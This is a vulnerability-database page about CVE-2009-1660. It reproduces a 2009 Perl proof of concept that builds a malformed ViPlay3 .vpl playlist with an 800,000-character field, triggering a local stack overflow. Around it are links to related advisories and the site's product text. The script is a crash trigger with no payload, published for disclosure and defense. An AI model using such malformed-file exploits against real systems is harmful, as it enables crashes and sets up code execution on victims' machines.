Lucene search
+L

ViPlay3 < 3.00 - '.vpl' Local Stack Overflow (PoC)

🗓️ 08 May 2009 00:00:00Reported by LiquidWormType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 32 Views

ViPlay3 <= 3.00 '.vpl' Local Stack Overflow (PoC) on Windows X

Related
Code
ReporterTitlePublishedViews
Family
circl
Circl
CVE-2009-1660
8 May 200900:00
circl
cve
CVE
CVE-2009-1660
17 May 200916:00
cve
cvelist
Cvelist
CVE-2009-1660
17 May 200916:00
cvelist
euvd
EUVD
EUVD-2009-1655
7 Oct 202500:30
euvd
nvd
NVD
CVE-2009-1660
18 May 200912:00
nvd
openvas
OpenVAS
ViPlay .vpl File Stack Overflow Vulnerability
26 May 200900:00
openvas
openvas
OpenVAS
ViPlay .vpl File Stack Overflow Vulnerability
26 May 200900:00
openvas
prion
Prion
Stack overflow
18 May 200912:00
prion
zeroscience
Zero Science Lab
ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
8 May 200900:00
zeroscience
#/usr/bin/perl
#
# ViPlay3 <= 3.00 (.vpl) Local Stack Overflow PoC
#
# Product web page: http://www.urusoft.net/
# Tested on Microsoft Windows XP Professional SP3 (English)
# Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
# liquidworm gmail com
# http://www.zeroscience.org/
# 08.05.2009

$b= "[General]\r\n".
    "Title=Proof of Concept\r\n".
    "Author=LiquidWorm\r\n".
    "Comments=2009\r\n".
    "Version=1.0\r\n".
    "[Files]\r\n";
    "Count=800000\r\n".
    "LastPlayed=0\r\n";
$c= "1=" . "A" x 800000 . "\r\n";
open a, ">./lqwrm.vpl";
print a $b.$c;
close a;
print "\n- Done!\n";

# milw0rm.com [2009-05-08]

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

08 May 2009 00:00Current
5.8Medium risk
Vulners AI Score5.8
CVSS 29.3
EPSS0.05826
32